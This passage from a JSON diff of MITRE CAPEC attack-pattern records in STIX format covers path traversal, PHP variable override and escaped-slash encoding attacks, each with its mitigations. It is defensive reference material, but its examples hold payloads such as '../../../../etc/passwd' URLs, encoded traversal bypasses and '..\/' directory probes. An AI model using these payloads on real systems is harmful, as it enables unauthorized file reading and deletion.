"course-of-action--a4112a44-a0f9-4bde-bebe-74ed96c4cd3f", + "spec_version": "2.1", + "target_ref": "attack-pattern--08c74bd3-c5ad-4d6c-a8bb-bb93d7503ddb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Backup copies of all configuration files", + "id": "course-of-action--5f72dfc6-fc40-4c50-b43a-fb3f8613c890", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-75-1", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1b2f0cb4-7979-41a9-b066-52623efd9be1", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5f72dfc6-fc40-4c50-b43a-fb3f8613c890", + "spec_version": "2.1", + "target_ref": "attack-pattern--08c74bd3-c5ad-4d6c-a8bb-bb93d7503ddb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Integrity monitoring for configuration files", + "id": "course-of-action--aa2dbad2-1557-43ad-8ca5-6e87d044a038", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-75-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d3b76047-8e3c-4ad6-890e-ee9b51ab15c6", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--aa2dbad2-1557-43ad-8ca5-6e87d044a038", + "spec_version": "2.1", + "target_ref": "attack-pattern--08c74bd3-c5ad-4d6c-a8bb-bb93d7503ddb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Enforce audit logging on code and 
configuration promotion procedures.", + "id": "course-of-action--544a1da1-171a-4152-aaf8-cafc91c6ffcd", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-75-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0f6c14a3-09ae-4833-b73c-17e14fa0ab03", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--544a1da1-171a-4152-aaf8-cafc91c6ffcd", + "spec_version": "2.1", + "target_ref": "attack-pattern--08c74bd3-c5ad-4d6c-a8bb-bb93d7503ddb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Load configuration from separate process and memory space, for example a separate physical device like a CD", + "id": "course-of-action--47fcab1d-3b96-49c9-ba5c-28f7cc396ddc", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-75-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6f3ed3dd-3d16-41fa-9408-5e346f652fed", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--47fcab1d-3b96-49c9-ba5c-28f7cc396ddc", + "spec_version": "2.1", + "target_ref": 
"attack-pattern--08c74bd3-c5ad-4d6c-a8bb-bb93d7503ddb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker manipulates inputs to the target software which the target software passes to file system calls in the OS. The goal is to gain access to, and perhaps modify, areas of the file system that the target software did not intend to be accessible.", + "external_references": [ + { + "external_id": "CAPEC-76", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/76.html" + }, + { + "external_id": "CWE-23", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/23.html" + }, + { + "external_id": "CWE-22", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/22.html" + }, + { + "external_id": "CWE-73", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/73.html" + }, + { + "external_id": "CWE-77", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/77.html" + }, + { + "external_id": "CWE-346", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html" + }, + { + "external_id": "CWE-348", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/348.html" + }, + { + "external_id": "CWE-285", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html" + }, + { + "external_id": "CWE-272", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/272.html" + }, + { + "external_id": "CWE-59", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/59.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-15", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/15.html" + }, + { + "description": "G. Hoglund, G. 
McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--36fd3642-e601-4392-b25b-48df2fdecf62", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Manipulating Web Input to File System Calls", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n The attacker uses relative path traversal to access files in the application. This is an example of accessing user's password file.\n http://www.example.com/getProfile.jsp?filename=../../../../etc/passwd\n However, the target application employs regular expressions to make sure no relative path sequences are being passed through the application to the web page. The application would replace all matches from this regex with the empty string.\n Then an attacker creates special payloads to bypass this filter:\n http://www.example.com/getProfile.jsp?filename=%2e%2e/%2e%2e/%2e%2e/%2e%2e /etc/passwd\n When the application gets this input string, it will be the desired vector by the attacker.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Fingerprinting of the operating system: In order to create a valid file injection, the attacker needs to know what the underlying OS is so that the proper file seperator is used.

  2. Techniques
    Port mapping. Identify ports that the system is listening on, and attempt to identify inputs and protocol types on those ports.
    TCP/IP Fingerprinting. The attacker uses various software to make connections or partial connections and observe idiosyncratic responses from the operating system. Using those responses, they attempt to guess the actual operating system.
    Induce errors to find informative error messages
  3. Survey the Application to Identify User-controllable Inputs: The attacker surveys the target application to identify all user-controllable inputs, possibly as a valid and authenticated user

  4. Techniques
    Spider web sites for all available links, entry points to the web site.
    Manually explore application and inventory all application inputs

Experiment

  1. Vary inputs, looking for malicious results: Depending on whether the application being exploited is a remote or local one, the attacker crafts the appropriate malicious input containing the path of the targeted file or other file system control syntax to be passed to the application

  2. Techniques
    Inject context-appropriate malicious file path using network packet injection tools (netcat, nemesis, etc.)
    Inject context-appropriate malicious file path using web test frameworks (proxies, TamperData, custom programs, etc.) or simple HTTP requests
    Inject context-appropriate malicious file system control syntax

Exploit

  1. Manipulate files accessible by the application: The attacker may steal information or directly manipulate files (delete, copy, flush, etc.)

  2. Techniques
    The attacker injects context-appropriate malicious file path to access the content of the targeted file.
    The attacker injects context-appropriate malicious file system control syntax to access the content of the targeted file.
    The attacker injects context-appropriate malicious file path to cause the application to create, delete a targeted file.
    The attacker injects context-appropriate malicious file system control syntax to cause the application to create, delete a targeted file.
    The attacker injects context-appropriate malicious file path in order to manipulate the meta-data of the targeted file.
    The attacker injects context-appropriate malicious file system control syntax in order to manipulate the meta-data of the targeted file.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Program must allow for user controlled variables to be applied directly to the filesystem" + ], + "x_capec_skills_required": { + "Low": "To identify file system entry point and execute against an over-privileged system interface" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--418adbc1-d3a0-4e06-b39d-4a47ced3edbb", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--10e0bdfb-cc84-4788-8d10-225b6e61f135", + "spec_version": "2.1", + "target_ref": "attack-pattern--36fd3642-e601-4392-b25b-48df2fdecf62", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Ensure all input is validated, and does not contain file system commands", + "id": "course-of-action--5606d417-4865-4533-8deb-e39c901f209e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-76-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--33951a4d-6ab2-4bdb-854f-4f2794baa0aa", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5606d417-4865-4533-8deb-e39c901f209e", + "spec_version": "2.1", + "target_ref": 
"attack-pattern--36fd3642-e601-4392-b25b-48df2fdecf62", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7822e43d-f894-41ac-88d5-41b2c0b4ef6e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--16c78c78-dace-4fe3-ac4a-aaf188d14af5", + "spec_version": "2.1", + "target_ref": "attack-pattern--36fd3642-e601-4392-b25b-48df2fdecf62", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: For interactive user applications, consider if direct file system interface is necessary, instead consider having the application proxy communication.", + "id": "course-of-action--3e8c9442-1e01-4fc2-9f90-b009bf6612fa", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-76-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--80063d3f-3b3f-4552-bbbe-499aabc86961", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3e8c9442-1e01-4fc2-9f90-b009bf6612fa", + "spec_version": "2.1", + "target_ref": "attack-pattern--36fd3642-e601-4392-b25b-48df2fdecf62", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": 
"relationship--d2b1d3bb-89ce-4615-be0c-c35eed6ad012", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8fb32cf0-80fd-4e8b-91c6-0908041d5b6e", + "spec_version": "2.1", + "target_ref": "attack-pattern--36fd3642-e601-4392-b25b-48df2fdecf62", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack targets user controlled variables (DEBUG=1, PHP Globals, and So Forth). An adversary can override variables leveraging user-supplied, untrusted query variables directly used on the application server without any data sanitization. In extreme cases, the adversary can change variables controlling the business logic of the application. For instance, in languages like PHP, a number of poorly set default configurations may allow the user to override variables.", + "external_references": [ + { + "external_id": "CAPEC-77", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/77.html" + }, + { + "external_id": "CWE-15", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/15.html" + }, + { + "external_id": "CWE-94", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/94.html" + }, + { + "external_id": "CWE-96", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/96.html" + }, + { + "external_id": "CWE-285", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html" + }, + { + "external_id": "CWE-302", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/302.html" + }, + { + "external_id": "CWE-473", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/473.html" + }, + { + "external_id": "CWE-1321", + "source_name": "cwe", + "url": 
"http://cwe.mitre.org/data/definitions/1321.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Artur Maj, Securing PHP: Step-by-Step, 2003--06---22, Security Focus", + "external_id": "REF-520", + "source_name": "reference_from_CAPEC", + "url": "http://www.securityfocus.com/infocus/1706" + }, + { + "description": "Clancy Malcolm, Ten Security Checks for PHP, Part 1, 2003--03---20", + "external_id": "REF-521", + "source_name": "reference_from_CAPEC" + }, + { + "description": "PHP Manual, The PHP Group", + "external_id": "REF-522", + "source_name": "reference_from_CAPEC", + "url": "http://www.php.net/manual/en/security.globals.php" + } + ], + "id": "attack-pattern--5e4a268e-f89f-445a-aa42-395922f56bf0", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Manipulating User-Controlled Variables", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--1fa1539d-4a13-4453-bf43-ad0987b2fbf5" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Read Data", + "Gain Privileges" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n PHP is a study in bad security. The main idea pervading PHP is \"ease of use,\" and the mantra \"don't make the developer go to any extra work to get stuff done\" applies in all cases. 
This is accomplished in PHP by removing formalism from the language, allowing declaration of variables on first use, initializing everything with preset values, and taking every meaningful variable from a transaction and making it available. In cases of collision with something more technical, the simple almost always dominates in PHP.\n One consequence of all this is that PHP allows users of a Web application to override environment variables with user-supplied, untrusted query variables. Thus, critical values such as the CWD and the search path can be overwritten and directly controlled by a remote anonymous user.\n Another similar consequence is that variables can be directly controlled and assigned from the user-controlled values supplied in GET and POST request fields. So seemingly normal code like this, does bizarre things:\n while($count < 10){// Do something$count++;}\n Normally, this loop will execute its body ten times. The first iteration will be an undefined zero, and further trips though the loop will result in an increment of the variable $count. The problem is that the coder does not initialize the variable to zero before entering the loop. This is fine because PHP initializes the variable on declaration. The result is code that seems to function, regardless of badness. The problem is that a user of the Web application can supply a request such as\n GET /login.php?count=9\n and cause $count to start out at the value 9, resulting in only one trip through the loop. Yerg.\n Depending on the configuration, PHP may accept user-supplied variables in place of environment variables. PHP initializes global variables for all process environment variables, such as $PATH and $HOSTNAME. These variables are of critical importance because they may be used in file or network operations. 
If an adversary can supply a new $PATH variable (such as PATH='/var'), the program may be exploitable.\n PHP may also take field tags supplied in GET/POST requests and transform them into global variables. This is the case with the $count variable we explored in our previous example.\n Consider another example of this problem in which a program defines a variable called $tempfile. An adversary can supply a new temp file such as $tempfile = \"/etc/passwd\". Then the temp file may get erased later via a call to unlink($tempfile);. Now the passwd file has been erased--a bad thing indeed on most OSs.\n Also consider that the use of include() and require() first search $PATH, and that using calls to the shell may execute crucial programs such as ls. In this way, ls may be \"Trojaned\" (the adversary can modify $PATH to cause a Trojan copy of ls to be loaded). This type of attack could also apply to loadable libraries if $LD_LIBRARY_PATH is modified.\n Finally, some versions of PHP may pass user data to syslog as a format string, thus exposing the application to a format string buffer overflow.See also: File upload allows arbitrary file read by setting hidden form variables to match internal variable names (CVE-2000-0860)" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Probe target application: The adversary first probes the target application to determine important information about the target. This information could include types software used, software versions, what user input the application consumes, and so on.

Experiment

  1. Find user-controlled variables: Using the information found by probing the application, the adversary attempts to manipulate many user-controlled variables and observes the effects on the application. If the adversary notices any significant changes to the application, they will know that a certain variable is useful to the application.

  2. Techniques
    Adversaries will try to alter many common variable names such as \"count\", \"tempFile\", \"i\", etc. The hope is that they can alter the flow of the application without knowing the inner-workings.
    Adversaries will try to alter known environment variables.

Exploit

  1. Manipulate user-controlled variables: Once the adversary has found a user-controller variable(s) that is important to the application, they will manipulate it to change the normal behavior in a way that benefits the adversary.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--f190e1b3-e8d6-4aef-817c-b3e7782e2aed", + "attack-pattern--a506984b-0870-42d9-8bcd-0787f13b8c2e" + ], + "x_capec_prerequisites": [ + "A variable consumed by the application server is exposed to the client.", + "A variable consumed by the application server can be overwritten by the user.", + "The application server trusts user supplied data to compute business logic.", + "The application server does not perform proper input validation." + ], + "x_capec_skills_required": { + "Low": "The malicious user can easily try some well-known global variables and find one which matches.", + "Medium": "The adversary can use automated tools to probe for variables that they can control." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n Do not allow override of global variables and do Not Trust Global Variables.\n If the register_globals option is enabled, PHP will create global variables for each GET, POST, and cookie variable included in the HTTP request. This means that a malicious user may be able to set variables unexpectedly. 
For instance make sure that the server setting for PHP does not expose global variables.\n ", + "id": "course-of-action--01f15bc6-e25d-4388-8a84-c6f82d7a7378", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-77-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--593062e2-612e-46ce-8739-0d2b1b15f720", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--01f15bc6-e25d-4388-8a84-c6f82d7a7378", + "spec_version": "2.1", + "target_ref": "attack-pattern--5e4a268e-f89f-445a-aa42-395922f56bf0", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "A software system should be reluctant to trust variables that have been initialized outside of its trust boundary. 
Ensure adequate checking is performed when relying on input from outside a trust boundary.", + "id": "course-of-action--35ecc67f-d191-49d1-b51d-512ab4874d6b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-77-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6d6ce1ff-fa90-41cf-86a8-911f793e6838", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--35ecc67f-d191-49d1-b51d-512ab4874d6b", + "spec_version": "2.1", + "target_ref": "attack-pattern--5e4a268e-f89f-445a-aa42-395922f56bf0", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Separate the presentation layer and the business logic layer. Variables at the business logic layer should not be exposed at the presentation layer. 
This is to prevent computation of business logic from user controlled input data.", + "id": "course-of-action--fdbec66f-5081-4d39-9732-af19bf458d7d", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-77-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3c40eaa0-2cde-4309-b3c3-79aebcc2ada3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fdbec66f-5081-4d39-9732-af19bf458d7d", + "spec_version": "2.1", + "target_ref": "attack-pattern--5e4a268e-f89f-445a-aa42-395922f56bf0", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use encapsulation when declaring your variables. 
This is to lower the exposure of your variables.", + "id": "course-of-action--9fa19f3a-821e-4faa-b728-a6d30e37b6c2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-77-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a3e969df-fa7a-479d-ba25-c6b31da5cffa", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9fa19f3a-821e-4faa-b728-a6d30e37b6c2", + "spec_version": "2.1", + "target_ref": "attack-pattern--5e4a268e-f89f-445a-aa42-395922f56bf0", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Assume all input is malicious. Create an allowlist that defines all valid input to the software system based on the requirements specifications. 
Input that does not match against the allowlist should be rejected by the program.", + "id": "course-of-action--3869586b-ef26-4f47-b6bf-e4aee5ac7dea", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-77-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5b6076ab-c2e1-428a-8d0f-b7f0642e9811", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3869586b-ef26-4f47-b6bf-e4aee5ac7dea", + "spec_version": "2.1", + "target_ref": "attack-pattern--5e4a268e-f89f-445a-aa42-395922f56bf0", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack targets the use of the backslash in alternate encoding. An adversary can provide a backslash as a leading character and causes a parser to believe that the next character is special. This is called an escape. 
By using that trick, the adversary tries to exploit alternate ways to encode the same character which leads to filter problems and opens avenues to attack.", + "external_references": [ + { + "external_id": "CAPEC-78", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/78.html" + }, + { + "external_id": "CWE-180", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/180.html" + }, + { + "external_id": "CWE-181", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/181.html" + }, + { + "external_id": "CWE-173", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/173.html" + }, + { + "external_id": "CWE-172", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/172.html" + }, + { + "external_id": "CWE-73", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/73.html" + }, + { + "external_id": "CWE-22", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/22.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "external_id": "CWE-707", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/707.html" + }, + { + "description": "G. Hoglund, G. 
McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--07e5901d-0f6d-41a9-ac19-e00eecece95f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Using Escaped Slashes in Alternate Encoding", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a1af7c24-25cb-46e5-a27b-ed316e1f91ce" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Bypass Protection Mechanism" + ], + "Availability": [ + "Resource Consumption (Denial of Service)", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read Data", + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Bypass Protection Mechanism" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n For example, the byte pair \\0 might result in a single zero byte (a NULL) being sent. Another example is \\t, which is sometimes converted into a tab character. There is often an equivalent encoding between the back slash and the escaped back slash. This means that \\/ results in a single forward slash. A single forward slash also results in a single forward slash. The encoding looks like this:\n / yields /\\/ yields /\n ", + "\n An attack leveraging escaped slashes in slternate encodings is very simple. If you believe the target may be filtering the slash, attempt to supply \\/ and see what happens. Example command strings to try out include\n CWD ..\\/..\\/..\\/..\\/winnt\n which converts in many cases to\n CWD ../../../../winnt\n To probe for this kind of problem, a small C program that uses string output routines can be very useful. 
